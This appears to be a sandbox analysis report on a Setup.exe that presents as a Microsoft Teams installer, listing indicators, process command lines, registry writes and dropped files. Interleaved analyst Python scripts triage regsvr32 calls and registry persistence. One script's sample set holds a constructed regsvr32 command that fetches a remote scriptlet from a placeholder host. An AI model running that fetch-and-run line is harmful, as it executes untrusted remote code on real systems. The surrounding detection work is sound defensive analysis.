File name: Setup.exe
Full analysis: https://app.any.run/tasks/fa1894ec-ef68-43fb-bf28-f4f45d930f2a
Verdict: Malicious activity
Analysis date: January 22, 2025, 01:38:05
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 8 sections
MD5: 974930CE3F894F494C573FB9E7EE0076
SHA1: 07819B738FAFF62A2724DFCF347860AAAC922A5C
SHA256: FCC862DB236CCD85A0E8184C72449A657FE31BB90F2DBD650FFF158260622D7D
SSDEEP: 98304:Nrhz972Ytp74dEIRm1otdlqZhY40U+DgLhqO0KkMVqw/DhXtr2MiJK4uFAwN8sgj:yjlNjlj

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • The DLL Hijacking

      • Teams.exe (PID: 3208)
      • Teams.exe (PID: 6352)
    • Changes the autorun value in the registry

      • Teams.exe (PID: 2076)
    • Registers / Runs the DLL via REGSVR32.EXE

      • Update.exe (PID: 7080)
  • SUSPICIOUS

    • Process drops legitimate windows executable

      • Setup.exe (PID: 6504)
      • Update.exe (PID: 7080)
      • MSTeamsSetup_c_l_.exe (PID: 7056)
    • Executable content was dropped or overwritten

      • Update.exe (PID: 7080)
      • Setup.exe (PID: 6504)
      • MSTeamsSetup_c_l_.exe (PID: 7056)
    • Reads security settings of Internet Explorer

      • Update.exe (PID: 7080)
      • Teams.exe (PID: 2076)
    • Starts a Microsoft application from unusual location

      • Setup.exe (PID: 6504)
    • The process drops C-runtime libraries

      • Update.exe (PID: 7080)
    • Checks Windows Trust Settings

      • Update.exe (PID: 7080)
    • Application launched itself

      • Teams.exe (PID: 2464)
      • Teams.exe (PID: 2076)
    • Creates/Modifies COM task schedule object

      • regsvr32.exe (PID: 244)
      • regsvr32.exe (PID: 6844)
    • Creates a software uninstall entry

      • Update.exe (PID: 7080)
    • Searches for installed software

      • Update.exe (PID: 7080)
  • INFO

    • The sample compiled with english language support

      • Setup.exe (PID: 6504)
      • Update.exe (PID: 7080)
    • Reads the computer name

      • Setup.exe (PID: 6504)
      • Update.exe (PID: 7080)
      • Squirrel.exe (PID: 3288)
      • Teams.exe (PID: 2464)
      • Update.exe (PID: 5544)
      • Teams.exe (PID: 3208)
      • Teams.exe (PID: 7016)
      • Teams.exe (PID: 6352)
      • Teams.exe (PID: 6564)
      • Teams.exe (PID: 1512)
      • Teams.exe (PID: 2076)
    • Checks supported languages

      • Setup.exe (PID: 6504)
      • Update.exe (PID: 7080)
      • MSTeamsSetup_c_l_.exe (PID: 7056)
      • Squirrel.exe (PID: 3288)
      • Teams.exe (PID: 2464)
      • Update.exe (PID: 5544)
      • Teams.exe (PID: 3208)
      • Teams.exe (PID: 7016)
      • Teams.exe (PID: 6352)
      • Teams.exe (PID: 6564)
      • Teams.exe (PID: 4824)
      • Teams.exe (PID: 2076)
      • Teams.exe (PID: 3544)
      • Teams.exe (PID: 1512)
      • Teams.exe (PID: 2548)
    • Reads Microsoft Office registry keys

      • Update.exe (PID: 7080)
      • Squirrel.exe (PID: 3288)
      • Update.exe (PID: 5544)
      • Teams.exe (PID: 2464)
      • Teams.exe (PID: 2076)
    • Checks proxy server information

      • Update.exe (PID: 7080)
      • Teams.exe (PID: 2464)
      • Update.exe (PID: 5544)
      • Teams.exe (PID: 2076)
      • Squirrel.exe (PID: 3288)
    • Disables trace logs

      • Update.exe (PID: 7080)
      • Update.exe (PID: 5544)
      • Squirrel.exe (PID: 3288)
    • Create files in a temporary directory

      • Update.exe (PID: 7080)
      • Teams.exe (PID: 2464)
      • Teams.exe (PID: 2076)
    • Reads the machine GUID from the registry

      • Update.exe (PID: 7080)
      • Squirrel.exe (PID: 3288)
      • Update.exe (PID: 5544)
      • Teams.exe (PID: 2076)
    • Reads the software policy settings

      • Update.exe (PID: 7080)
      • Update.exe (PID: 5544)
      • Squirrel.exe (PID: 3288)
      • Teams.exe (PID: 2076)
    • Creates files or folders in the user directory

      • Update.exe (PID: 7080)
      • Setup.exe (PID: 6504)
      • MSTeamsSetup_c_l_.exe (PID: 7056)
      • Squirrel.exe (PID: 3288)
      • Teams.exe (PID: 2464)
      • Update.exe (PID: 5544)
      • Teams.exe (PID: 2076)
      • Teams.exe (PID: 6564)
    • Process checks computer location settings

      • Update.exe (PID: 7080)
      • Teams.exe (PID: 2464)
      • Teams.exe (PID: 2076)
      • Teams.exe (PID: 4824)
      • Teams.exe (PID: 3544)
      • Teams.exe (PID: 2548)
    • Reads CPU info

      • Teams.exe (PID: 2464)
      • Teams.exe (PID: 2076)
    • Reads product name

      • Teams.exe (PID: 2464)
      • Teams.exe (PID: 2076)
    • Reads Environment values

      • Teams.exe (PID: 2464)
      • Teams.exe (PID: 2076)
    • The process uses the downloaded file

      • Update.exe (PID: 7080)
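The MALICIOUS block above flags "Registers / Runs the DLL via REGSVR32.EXE"; the command line behind it (PID 244 in the process list further down) is regsvr32 with /s /n /i:user and a DLL under the user's AppData. The triage routine below is an added example, not ANY.RUN's or Microsoft's code: it splits a regsvr32 command line into switches and target module and grades it, treating a user-writable DLL path as something to verify rather than something to convict. The first sample is the report's own command line; the other two are constructed here (example.invalid is a placeholder host) so the rules have a remote-scriptlet case and a benign System32 case to separate it from.

```python
"""Triage regsvr32 command lines from process-creation telemetry.

Added example for this report; it is not ANY.RUN's or Microsoft's code. The
first sample command line is the one the report shows for PID 244; the other
two are constructed here to give the rules something to separate it from.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# Tokenizer that keeps a quoted Windows path together.
TOKEN = re.compile(r'"([^"]*)"|(\S+)')

# Directories a standard user can write to. A DLL registered from one of these
# is attacker-controllable even when the caller (regsvr32) is a signed binary.
USER_WRITABLE = re.compile(
    r"^(?:[a-z]:\\users\\|[a-z]:\\programdata\\|[a-z]:\\windows\\temp\\|"
    r"%(?:appdata|localappdata|temp|tmp|userprofile)%)",
    re.I,
)
# A URL or UNC path handed to regsvr32 or to /i: means code fetched off-host.
REMOTE = re.compile(r"^(?:https?|ftp)://|^\\\\", re.I)


@dataclass
class Regsvr32Call:
    target: Optional[str] = None        # DLL (or URL) regsvr32 was asked to load
    install_arg: Optional[str] = None   # text after /i:, passed to DllInstall
    switches: set = field(default_factory=set)
    severity: str = "low"
    reasons: list = field(default_factory=list)


def parse_regsvr32(cmdline: str) -> Regsvr32Call:
    """Split a regsvr32 command line into switches and the target module."""
    call = Regsvr32Call()
    for quoted, bare in TOKEN.findall(cmdline):
        tok = quoted or bare
        low = tok.lower()
        if low.endswith("regsvr32.exe") or low == "regsvr32":
            continue                                   # the program name itself
        if tok.startswith("/"):
            name, _, arg = tok[1:].partition(":")
            call.switches.add(name.lower())
            if name.lower() == "i":
                call.install_arg = arg or None        # bare /i carries no argument
        elif call.target is None:
            call.target = tok
    return call


def triage(cmdline: str) -> Regsvr32Call:
    """Attach a severity and the reasons behind it to a parsed command line."""
    call = parse_regsvr32(cmdline)
    target = call.target or ""
    if REMOTE.search(target) or (call.install_arg and REMOTE.search(call.install_arg)):
        call.severity = "high"
        call.reasons.append("module or /i: argument points off-host (URL or UNC)")
    if target.lower().endswith("scrobj.dll") and call.install_arg:
        call.severity = "high"
        call.reasons.append("scrobj.dll with /i: executes a COM scriptlet, not a DLL registration")
    if USER_WRITABLE.search(target):
        if call.severity == "low":
            call.severity = "medium"
        call.reasons.append("module lives in a user-writable directory; "
                            "verify its Authenticode signature before allow-listing")
    if {"n", "i"} <= call.switches:
        # /n skips DllRegisterServer; /i:<arg> calls DllInstall(TRUE, arg).
        # By convention the string "user" asks the module for per-user (HKCU) registration.
        call.reasons.append(f"/n /i:{call.install_arg or ''}: DllInstall path only, "
                            "so expect HKCU rather than HKLM writes")
    return call


SAMPLE_CMDLINES = {
    # From the report (PID 244): Teams registering its Outlook meeting add-in per user.
    "teams_addin": '/s /n /i:user "C:\\Users\\admin\\AppData\\Local\\Microsoft\\TeamsMeetingAddin'
                   '\\1.0.24151.2\\x64\\Microsoft.Teams.AddinLoader.dll"',
    # Constructed: remote-scriptlet abuse ("Squiblydoo"); example.invalid is a placeholder host.
    "squiblydoo": "regsvr32.exe /s /n /u /i:http://example.invalid/payload.sct scrobj.dll",
    # Constructed: an ordinary registration from System32.
    "system32": "regsvr32.exe /s C:\\Windows\\System32\\msxml6.dll",
}


def triage_all(samples: dict = SAMPLE_CMDLINES) -> dict:
    return {name: triage(cmd) for name, cmd in samples.items()}


if __name__ == "__main__":
    for name, call in triage_all().items():
        print(f"{name:12} {call.severity:6} {call.target}")
        for reason in call.reasons:
            print(f"{'':12} - {reason}")
```

The report's own line comes out "medium": the caller is a Windows binary and the switches are the documented per-user install pattern, but the module sits under C:\Users, so the signer of Microsoft.Teams.AddinLoader.dll, not the CompanyName string in its version resource, is what an allow-list entry should key on.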
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (76.4)
.exe | Win32 Executable (generic) (12.4)
.exe | Generic Win/DOS Executable (5.5)
.exe | DOS Executable Generic (5.5)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:01:21 16:07:41+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.29
CodeSize: 2274304
InitializedDataSize: 27071488
UninitializedDataSize: -
EntryPoint: 0x21765c
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 1.7.0.3315
ProductVersionNumber: 1.7.0.3315
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
FileDescription: Microsoft Teams
FileVersion: 1.7.00.3315
InternalName: Setup.exe
LegalCopyright: Copyright (C) 2016 Microsoft. All rights reserved.
OriginalFileName: Setup.exe
ProductName: Microsoft Teams
ProductVersion: 1.7.00.3315
SquirrelAwareVersion: 1
CompanyName: Microsoft Corporation
Total processes: 150
Monitored processes: 18
Malicious processes: 7
Suspicious processes: 0

Behavior graph

Processes shown in the graph, as listed: setup.exe, msteamssetup_c_l_.exe, update.exe, squirrel.exe, teams.exe (10 instances), update.exe, regsvr32.exe (3 instances)

Process information

Each entry gives the PID, parent process, command line (CMD), image path, process details and the first loaded images.
PID 244 (parent process: regsvr32.exe)
CMD: /s /n /i:user "C:\Users\admin\AppData\Local\Microsoft\TeamsMeetingAddin\1.0.24151.2\x64\Microsoft.Teams.AddinLoader.dll"
Path: C:\Windows\System32\regsvr32.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft(C) Register Server
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Loaded images:
  c:\windows\system32\regsvr32.exe
  c:\windows\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\apphelp.dll
  c:\windows\system32\aclayers.dll
  c:\windows\system32\msvcrt.dll
  c:\windows\system32\user32.dll
  c:\windows\system32\win32u.dll
  c:\windows\system32\gdi32.dll
PID 1512 (parent process: Teams.exe)
CMD: "C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --enable-wer --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Teams" --mojo-platform-channel-handle=3800 --field-trial-handle=1800,i,5833771605061345395,7131410816166854461,131072 --enable-features=ContextBridgeMutability,SharedArrayBuffer,WinUseBrowserSpellChecker,WinUseHybridSpellChecker --disable-features=CalculateNativeWinOcclusion,ExtraCookieValidityChecks,ForcedColors,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
Path: C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe
User: admin
Company: Microsoft Corporation
Integrity Level: LOW
Description: Microsoft Teams
Version: 1.7.00.19353
Loaded images:
  c:\users\admin\appdata\local\microsoft\teams\current\teams.exe
  c:\windows\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\oleaut32.dll
  c:\windows\system32\msvcp_win.dll
  c:\windows\system32\ucrtbase.dll
  c:\windows\system32\combase.dll
  c:\windows\system32\rpcrt4.dll
  c:\windows\system32\ws2_32.dll
PID 2076 (parent process: Update.exe)
CMD: "C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe" --squirrel-firstrun
Path: C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Teams
Version: 1.7.00.19353
Loaded images:
  c:\users\admin\appdata\local\microsoft\teams\current\teams.exe
  c:\windows\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\users\admin\appdata\local\microsoft\teams\current\ffmpeg.dll
  c:\windows\system32\oleaut32.dll
  c:\windows\system32\msvcp_win.dll
  c:\windows\system32\uiautomationcore.dll
  c:\windows\system32\ucrtbase.dll
  c:\windows\system32\rpcrt4.dll
PID 2464 (parent process: Update.exe)
CMD: "C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe" --squirrel-install 1.7.00.19353
Path: C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Teams
Exit code: 0
Version: 1.7.00.19353
Loaded images:
  c:\users\admin\appdata\local\microsoft\teams\current\teams.exe
  c:\windows\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\oleaut32.dll
  c:\windows\system32\msvcp_win.dll
  c:\windows\system32\ucrtbase.dll
  c:\windows\system32\combase.dll
  c:\windows\system32\rpcrt4.dll
  c:\windows\system32\uiautomationcore.dll
PID 2548 (parent process: Teams.exe)
CMD: "C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe" --type=renderer --enable-wer --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Teams" --app-user-model-id=com.squirrel.Teams.Teams --app-path="C:\Users\admin\AppData\Local\Microsoft\Teams\current\resources\app.asar" --enable-sandbox --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4768 --field-trial-handle=1800,i,5833771605061345395,7131410816166854461,131072 --enable-features=ContextBridgeMutability,SharedArrayBuffer,WinUseBrowserSpellChecker,WinUseHybridSpellChecker --disable-features=CalculateNativeWinOcclusion,ExtraCookieValidityChecks,ForcedColors,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --msteams-process-type=accountSelectWindow /prefetch:1
Path: C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe
User: admin
Company: Microsoft Corporation
Integrity Level: LOW
Description: Microsoft Teams
Version: 1.7.00.19353
Loaded images:
  c:\users\admin\appdata\local\microsoft\teams\current\teams.exe
  c:\windows\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\oleaut32.dll
  c:\windows\system32\msvcp_win.dll
  c:\windows\system32\ucrtbase.dll
  c:\windows\system32\combase.dll
  c:\windows\system32\rpcrt4.dll
  c:\windows\system32\ws2_32.dll
PID 3208 (parent process: Teams.exe)
CMD: "C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe" --type=gpu-process --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Teams" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1732 --field-trial-handle=1896,i,9580035878589261955,6433630308446160644,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
Path: C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe
User: admin
Company: Microsoft Corporation
Integrity Level: LOW
Description: Microsoft Teams
Exit code: 0
Version: 1.7.00.19353
Loaded images:
  c:\users\admin\appdata\local\microsoft\teams\current\teams.exe
  c:\windows\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\oleaut32.dll
  c:\windows\system32\msvcp_win.dll
  c:\windows\system32\ucrtbase.dll
  c:\windows\system32\combase.dll
  c:\windows\system32\rpcrt4.dll
  c:\windows\system32\ws2_32.dll
PID 3288 (parent process: Update.exe)
CMD: "C:\Users\admin\AppData\Local\Microsoft\Teams\current\Squirrel.exe" --updateSelf=C:\Users\admin\AppData\Local\SquirrelTemp\Update.exe
Path: C:\Users\admin\AppData\Local\Microsoft\Teams\current\Squirrel.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Teams classic
Exit code: 0
Version: 3.3.13.0
Loaded images:
  c:\users\admin\appdata\local\microsoft\teams\current\squirrel.exe
  c:\windows\system32\ntdll.dll
  c:\windows\syswow64\ntdll.dll
  c:\windows\system32\wow64.dll
  c:\windows\system32\wow64win.dll
  c:\windows\system32\wow64cpu.dll
  c:\windows\syswow64\mscoree.dll
  c:\windows\syswow64\kernel32.dll
  c:\windows\syswow64\kernelbase.dll
  c:\windows\syswow64\advapi32.dll
PID 3544 (parent process: Teams.exe)
CMD: "C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe" --type=renderer --enable-wer --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Teams" --app-user-model-id=com.squirrel.Teams.Teams --app-path="C:\Users\admin\AppData\Local\Microsoft\Teams\current\resources\app.asar" --enable-sandbox --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3156 --field-trial-handle=1800,i,5833771605061345395,7131410816166854461,131072 --enable-features=ContextBridgeMutability,SharedArrayBuffer,WinUseBrowserSpellChecker,WinUseHybridSpellChecker --disable-features=CalculateNativeWinOcclusion,ExtraCookieValidityChecks,ForcedColors,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --msteams-process-type=notificationsManager /prefetch:1
Path: C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe
User: admin
Company: Microsoft Corporation
Integrity Level: LOW
Description: Microsoft Teams
Version: 1.7.00.19353
Loaded images:
  c:\users\admin\appdata\local\microsoft\teams\current\teams.exe
  c:\windows\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\oleaut32.dll
  c:\windows\system32\msvcp_win.dll
  c:\windows\system32\ucrtbase.dll
  c:\windows\system32\combase.dll
  c:\windows\system32\rpcrt4.dll
  c:\windows\system32\ws2_32.dll
PID 4824 (parent process: Teams.exe)
CMD: "C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe" --type=renderer --enable-wer --user-data-dir="C:\Users\admin\AppData\Roaming\Microsoft\Teams" --app-user-model-id=com.squirrel.Teams.Teams --app-path="C:\Users\admin\AppData\Local\Microsoft\Teams\current\resources\app.asar" --enable-sandbox --first-renderer-process --autoplay-policy=no-user-gesture-required --disable-background-timer-throttling --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2520 --field-trial-handle=1800,i,5833771605061345395,7131410816166854461,131072 --enable-features=ContextBridgeMutability,SharedArrayBuffer,WinUseBrowserSpellChecker,WinUseHybridSpellChecker --disable-features=CalculateNativeWinOcclusion,ExtraCookieValidityChecks,ForcedColors,SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand --msteams-process-type=loadingWindow /prefetch:1
Path: C:\Users\admin\AppData\Local\Microsoft\Teams\current\Teams.exe
User: admin
Company: Microsoft Corporation
Integrity Level: LOW
Description: Microsoft Teams
Version: 1.7.00.19353
Loaded images:
  c:\users\admin\appdata\local\microsoft\teams\current\teams.exe
  c:\windows\system32\ntdll.dll
  c:\windows\system32\kernel32.dll
  c:\windows\system32\kernelbase.dll
  c:\windows\system32\oleaut32.dll
  c:\windows\system32\msvcp_win.dll
  c:\windows\system32\ucrtbase.dll
  c:\windows\system32\combase.dll
  c:\windows\system32\rpcrt4.dll
  c:\windows\system32\ws2_32.dll
PID 5544 (parent process: Teams.exe)
CMD: C:\Users\admin\AppData\Local\Microsoft\Teams\Update.exe --createShortcut=Teams.exe -l=StartMenu
Path: C:\Users\admin\AppData\Local\Microsoft\Teams\Update.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Teams classic
Exit code: 0
Version: 3.3.15.0
Loaded images:
  c:\users\admin\appdata\local\microsoft\teams\update.exe
  c:\windows\system32\ntdll.dll
  c:\windows\syswow64\ntdll.dll
  c:\windows\system32\wow64.dll
  c:\windows\system32\wow64win.dll
  c:\windows\system32\wow64cpu.dll
  c:\windows\syswow64\mscoree.dll
  c:\windows\syswow64\kernel32.dll
  c:\windows\syswow64\kernelbase.dll
  c:\windows\syswow64\advapi32.dll
Total events: 15 560
Read events: 14 889
Write events: 652
Delete events: 19

Modification events

(PID) Process | Operation | Key | Name = Value
(7080) Update.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Update_RASAPI32 | EnableFileTracing = 0
(7080) Update.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Update_RASAPI32 | EnableAutoFileTracing = 0
(7080) Update.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Update_RASAPI32 | EnableConsoleTracing = 0
(7080) Update.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Update_RASAPI32 | FileTracingMask = (value not shown in report)
(7080) Update.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Update_RASAPI32 | ConsoleTracingMask = (value not shown in report)
(7080) Update.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Update_RASAPI32 | MaxFileSize = 1048576
(7080) Update.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Update_RASAPI32 | FileDirectory = %windir%\tracing
(7080) Update.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Update_RASMANCS | EnableFileTracing = 0
(7080) Update.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Update_RASMANCS | EnableAutoFileTracing = 0
(7080) Update.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\Update_RASMANCS | EnableConsoleTracing = 0
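Every modification event the report prints is under HKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing, which is what the INFO-level "Disables trace logs" indicator keys on, while the two behaviours that actually matter for persistence ("Changes the autorun value in the registry" by Teams.exe and "Creates/Modifies COM task schedule object" by regsvr32) are named but their keys are not shown. The triage below is an added example, not ANY.RUN's code: it buckets registry writes into persistence candidates versus known noise. The ten Tracing writes are the report's own; the two persistence writes are constructed here (placeholder CLSID, illustrative Run value) so the interesting bucket is not empty.

```python
"""Bucket sandbox registry writes into persistence candidates versus known noise.

Added example for this report, not ANY.RUN's code. The ten events in
REPORT_WRITES are the ones the report lists for PID 7080; CONSTRUCTED_WRITES
are made up here to show what a write worth escalating looks like.
"""
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass(frozen=True)
class RegWrite:
    pid: int
    process: str
    key: str
    name: str
    value: Optional[str]


# (pattern over the full key path, category, why an analyst should care)
RULES = [
    (re.compile(r"\\CurrentVersion\\Run(Once)?$", re.I), "autorun",
     "value is executed at logon; confirm the target binary and its signer"),
    (re.compile(r"\\CLSID\\\{[0-9A-F-]+\}\\(InprocServer32|LocalServer32)$", re.I), "com-server",
     "COM class now resolves to this module; check the path is not user-writable"),
    (re.compile(r"\\Schedule\\TaskCache\\", re.I), "scheduled-task",
     "task definition written directly to the registry"),
    # HKLM\SOFTWARE[\WOW6432Node]\Microsoft\Tracing\<exe>_RASAPI32 / _RASMANCS are
    # written by the RAS tracing runtime when a process first loads rasapi32/rasman,
    # typically pulled in by WinINet/WinHTTP connectivity checks. Values of 0 are the
    # defaults, so "Disables trace logs" fires for practically every networked app.
    (re.compile(r"^HKEY_LOCAL_MACHINE\\SOFTWARE\\(WOW6432Node\\)?Microsoft\\Tracing\\"
                r"[^\\]+_(RASAPI32|RASMANCS)$", re.I),
     "noise:ras-tracing", "default tracing config, not a defence-evasion action"),
]

USER_WRITABLE = re.compile(r"(^|[\s\"'])[a-z]:\\users\\", re.I)


def classify(w: RegWrite) -> tuple[str, str]:
    """Return (category, rationale) for one registry write."""
    for pattern, category, why in RULES:
        if pattern.search(w.key):
            if category in ("autorun", "com-server") and w.value and USER_WRITABLE.search(w.value):
                why += "; target is under C:\\Users, which any user can modify"
            return category, why
    return "unclassified", "no rule matched; review manually"


def summarize(writes: Iterable[RegWrite]) -> dict:
    """Group writes by category, keeping the rationale next to each one."""
    buckets = defaultdict(list)
    for w in writes:
        category, why = classify(w)
        buckets[category].append((w, why))
    return dict(buckets)


TRACING = "HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Tracing\\"
REPORT_WRITES = [
    RegWrite(7080, "Update.exe", TRACING + "Update_RASAPI32", "EnableFileTracing", "0"),
    RegWrite(7080, "Update.exe", TRACING + "Update_RASAPI32", "EnableAutoFileTracing", "0"),
    RegWrite(7080, "Update.exe", TRACING + "Update_RASAPI32", "EnableConsoleTracing", "0"),
    RegWrite(7080, "Update.exe", TRACING + "Update_RASAPI32", "FileTracingMask", None),
    RegWrite(7080, "Update.exe", TRACING + "Update_RASAPI32", "ConsoleTracingMask", None),
    RegWrite(7080, "Update.exe", TRACING + "Update_RASAPI32", "MaxFileSize", "1048576"),
    RegWrite(7080, "Update.exe", TRACING + "Update_RASAPI32", "FileDirectory", "%windir%\\tracing"),
    RegWrite(7080, "Update.exe", TRACING + "Update_RASMANCS", "EnableFileTracing", "0"),
    RegWrite(7080, "Update.exe", TRACING + "Update_RASMANCS", "EnableAutoFileTracing", "0"),
    RegWrite(7080, "Update.exe", TRACING + "Update_RASMANCS", "EnableConsoleTracing", "0"),
]
# Constructed writes: the report names these behaviours but does not print the keys.
# The CLSID is a placeholder and the Run value is illustrative.
CONSTRUCTED_WRITES = [
    RegWrite(2076, "Teams.exe",
             "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
             "com.squirrel.Teams.Teams",
             "C:\\Users\\admin\\AppData\\Local\\Microsoft\\Teams\\Update.exe --processStart \"Teams.exe\""),
    RegWrite(244, "regsvr32.exe",
             "HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{00000000-0000-0000-0000-000000000000}\\InprocServer32",
             "(Default)",
             "C:\\Users\\admin\\AppData\\Local\\Microsoft\\TeamsMeetingAddin\\1.0.24151.2\\x64\\Microsoft.Teams.AddinLoader.dll"),
]


if __name__ == "__main__":
    for category, items in summarize(REPORT_WRITES + CONSTRUCTED_WRITES).items():
        print(f"{category}: {len(items)} write(s)")
        for w, why in items:
            print(f"  ({w.pid}) {w.process} {w.key}\\{w.name} -> {why}")
```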
Executable files: 347
Suspicious files: 180
Text files: 143
Unknown types: 0

Dropped files

PID | Process | Filename | Type
7080 | Update.exe | C:\Users\admin\AppData\Local\Microsoft\Teams\packages\Teams-1.7.00.19353-full.nupkg | (type not shown)
  MD5: (not shown)  SHA256: (not shown)
6504 | Setup.exe | C:\Users\admin\AppData\Local\Downloads\MSTeamsSetup_c_l_.exe | executable
  MD5: CF0E0F57B68A11D099EC944200A6069D  SHA256: 73354811E3109E265821124A18B1B7D9FD3DD1207BB46C18937D250C6AB46DEC
7056 | MSTeamsSetup_c_l_.exe | C:\Users\admin\AppData\Local\SquirrelTemp\downloading.gif | image
  MD5: 3488A1749B859E969C01BA981036FAB6  SHA256: C3FA333FDBCE95D504AEE31912993DC17AB31324428F557AC774F7E98B049B99
7056 | MSTeamsSetup_c_l_.exe | C:\Users\admin\AppData\Local\SquirrelTemp\background.gif | image
  MD5: FF1F29DCA0451246C3CA6CB7B023434F  SHA256: 753D7D351E427246E2B6CC86C45E21F952939E306C3EB2FDB1BD7D67842C64B8
7080 | Update.exe | C:\Users\admin\AppData\Roaming\Microsoft\Teams\teams_install_session.json | binary
  MD5: 2CC9923247802851214D26C7B72D4A41  SHA256: FC42C5CDD0A8D651C3BDD3B7E01ED96DD2D5086CD92A1DFA6332B5DA2DA233B8
7056 | MSTeamsSetup_c_l_.exe | C:\Users\admin\AppData\Local\SquirrelTemp\Update.exe | executable
  MD5: 8F0E958D7EF57D727ADCDA1C67C24C2B  SHA256: 4955CC6E58049EF1E274F340C8425CC55B324278199C92AC0DE87DF05BFAD35D
7080 | Update.exe | C:\Users\admin\AppData\Local\SquirrelTemp\setup.json | binary
